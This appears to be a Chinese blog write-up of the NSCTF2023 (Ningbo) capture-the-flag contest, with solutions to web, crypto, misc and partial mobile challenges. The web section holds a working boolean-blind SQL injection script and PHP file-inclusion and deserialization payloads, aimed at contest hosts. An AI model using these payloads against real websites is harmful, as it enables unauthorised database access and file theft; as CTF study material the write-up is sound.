第六届宁波市赛 [NSCTF2023] 部分web+部分misc+部分密码+mobile

Leafzzz__

于 2023-05-20 16:04:21 发布

阅读量288

点赞数 1

分类专栏： CTF比赛复现文章标签： php web安全

本文链接：https://blog.csdn.net/Leaf_initial/article/details/130782499

版权

CTF比赛复现专栏收录该内容

19 篇文章 5 订阅

订阅专栏

前言

只有web，misc是我写的，剩下的都是队的师傅写的，我是飞舞，就这样

Web

Query

查看源码有hintlogin.php，然后有显示登录界面

利用万能密码进行登录，有回显

回显是登陆成功利用脚本进行布尔盲注

import requests
import string

url="http://d574c221d2a0f4da.node.nsctf.cn/login.php"
s=string.ascii_letters+string.digits
flag=''
for i in range(1,999):
    print(i)
    for j in range(32,128):

        # 库名
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i},1))/**/like/**/{j},1,0)#"

        # 表名
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#"

        # 列名
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(column_name)frOm/**/information_schema.columns/**/where/**/table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#"

        s = f"-1'/**/or/**/if(ord(substr((select/**/group_concat(flagdata)/**/from/**/ctf.f111),{i},1))/**/like/**/{j},1,0)#"

        data={
            'username':s,
            'password':1
        }

        r=requests.post(url,data=data)
        if "登录成功" in r.text:
            flag+=chr(j)
            print(flag)
            break

运行脚本得出flag

Deserialization

按f12得到hint

//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST["input"];
if(!isset($read) or !isset($input))
{
    die("NONONO!");
}
if(strpos($read, "f14g")===FALSE)
{
    include($read);
    $input = unserialize($input);
    $input2 = clone $input;
    $input2->position = "route.php";
}
else{
    die("NONONO!"); 
}

构造payload读取route.php文件源码

read=php://filter/read=convert.base64-encode/resource=route.php&input=1

base解密得到代码：

<h1>Here can you find the position of the flag!</h1>

<?php

$position = "f14g.php";
$gadget = "h1nt.php";

?>

相同方法查看h1nt.php:

read=php://filter/read=convert.base64-encode/resource=h1nt.php&input=1

解密得:

<?php
class test
{
    public $position;
    public function __clone(){  
        echo file_get_contents($this->position); 
        return $this->position;
    }
}  
?>

然后反序列化，使position的值设置为可以读取f14g.php的payload

class test
{
    public $position ;
    public function __construct($position){
        $this ->position = $position;
    }

    public function __clone(){
        echo file_get_contents($this->position);
        return $this->position;
    }
}

$input = new test("php://filter/read=convert.base64-encode/resource=f14g.php");
print (serialize($input).PHP_EOL);

传入参数

read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:57:"php://filter/read=convert.base64-encode/resource=f14g.php";}

base64解密得到flag

CodeCheck

f12得到hint

 
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    die("NONONO");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}

说明我们要传入a的文件内容是flag

并且需要让b的文件内容和c传入的参数相同

然后传入d，利用include()函数来读取文件

get传参

http://96d9f0fc6195d0b3.node.nsctf.cn/?a=data://text/plain,flag&b=data://text/plain,flag&c=flag&d=php://filter/read=convert.base64-encode/resource=index.php

base64解密得到flag

Crypto

secret

e，phi不互素，脚本直接梭

p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831
q=147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753
n=19850163314401552502654477751795889962324360064924594948231168092741951675262933573691070993863763290962945190372400262526595224437463969238332927564085237271719298626877917792595603744433881409963046292095205686879015029586659384866719514948181682427744555313382838805740723664050846950001916332631397606277703888492927635867870538709596993987439225247816137975156657119509372023083507772730332482775258444611462771095896380644997011341265021719189098262072756342069189262188127428079017418048118345180074280858160934483114966968365184788420091050939327341754449300121493187658865378182447547202838325648863844192743
c=13913396366755010607043477552577268277928241319101215381662331498046080625902831202486646020767568921881185124894960242867254162927605416228460108399087406989258037017639619195506711090012877454131383568832750606102901110782045529267940504471322847364808094790662696785470594892244716137203781890284216874035486302506042263453255580475380742959201314003788553692977914357996982118328587119124144181290753389394149235381045389696841471483947310663329993873046123134587149661347999774958105091103806375702387084149309542351541021140111048408248121408401601979108510758891595550054699719801708646232427198902271953673874
e=28
n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e,phi)
t1 = e // t
dt1 = gmpy2.invert(t1,phi)
mt1 = pow(c,dt1,n)
s,m = gmpy2.iroot(mt1,t)
print(long_to_bytes(s))

Morse的笔记本

secret.txt中是一句话，将标点符号单独取出

。，，。！。，！。。。！。。。！。，，！，，，！。，。！，。。！。。！。。。！，。，。！，，，！，。！，，。！。，。！。，！，！。。。

猜测是摩斯密码，利用在线网站解密

PASSWORDISCONGRATS，猜测是维吉尼亚密码，将附件中给的密码解密，密钥经过测试是congrats

ciphey解出flag

RSA

在线网站直接分解n-1，得到g

2 * 1346104232461691 *13570850594633462506426369052182298554140635599543685835372377476383038708650421475723391142118956001358520246769650699398490037618758005241062608387057439283872260149565854577827352267289963736282502923131251179400580891491236925451166755184695335564693793568286112036468975877609637392241679

利用脚本解密：

from Crypto.Util.number import inverse, long_to_bytes

g = 1346104232461691
n = 36535558847082719901201561031181835346574576610950713924924272947759193576365817762980927638691696601293089537315055413746788190208875234794229119049056299551864869870291634941246362436491006904347559559494705922259007299126640817275929491680601926404543198957206717290905220235571289759182878331893962038379
c = 532997872940452282189043430008002793694788439822465302532208754231005799057972378308576109082463996551992533174546386979606697890310597738637156771564229
a = 2694858406312563434474553988904403597551484373358339092528913028454100111881368126493990657117571672510331411186745639563619323775673115439

e = 65537
d = inverse(e, (a - 1) * (g - 1))
plaintext = pow(c, d, a * g)
decrypted_message = long_to_bytes(plaintext)

print("Decrypted message:", decrypted_message.decode())

得到flag

Decrypted message: flag{p01la4d_rHo_a1gOr1thM_r1gh4}

Misc

ZIP

附件为压缩包，要想解密需要密码，但是有hint

The art of 0 and 1, and it will remain shorter than 9.

说明密码只有0和1，并且不超过9位

利用字典生成工具生成字典

然后对压缩包进行字典爆破解密

爆破出密码，得到flag

SimpleDocument

010打开文件，发现PDF文件头

手动分离文件，并且保存为PDF文件

pdf里什么都没有，所以

转化为word文件，改变一下颜色字体，得到flag

Mobile

peacock

1.主逻辑在test内，发现test内部加载了test库

1684561616670

1684561621104

2.找到lib里面的libtest.so文件，使用ida打开

1684561705741

在字符串窗口发现了base64加密的密文以及table

1684561748390